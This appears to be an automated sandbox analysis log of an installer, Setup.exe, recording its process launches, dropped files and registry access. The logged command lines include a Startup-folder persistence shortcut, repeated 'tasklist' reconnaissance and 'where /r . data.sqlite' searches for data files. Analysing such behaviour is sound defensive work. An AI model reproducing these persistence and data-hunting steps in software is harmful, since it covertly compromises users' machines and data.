Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\where.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c149297e-6f19-4d06-8ddb-7807f8b84ab1.tmp.node	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8dc2e56e-3a34-45cd-8db1-cde7ca3b7178.tmp.node	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Setup\libEGL.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Setup\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Setup\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a72c96d9-4557-4a69-8de5-5e32a2c87665.tmp.node	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Setup\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\76dc3e7b-42c7-418c-a7d9-9ee8c15a4191.tmp.node	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Setup\vk_swiftshader.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

API coverage: 8.5 %

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

API call chain: ExitProcess graph end node

graph_7-3626

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe

Code function: 7_2_00406DDD LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_00406DDD

Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe"

Jump to behavior

Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1688 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe C:\Users\user\AppData\Local\Programs\Setup\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.lnk" /T:C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2248 --field-trial-handle=1692,i,14834755097693353692,10985245987311762671,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\where.exe where /r . data.sqlite	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1648 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe "C:\Users\user\AppData\Local\Programs\Setup\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2304 --field-trial-handle=1764,i,3145727516655865599,8822023245888026874,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\AppData\Local\Programs\Setup\Setup.exe	Process created: unknown unknown
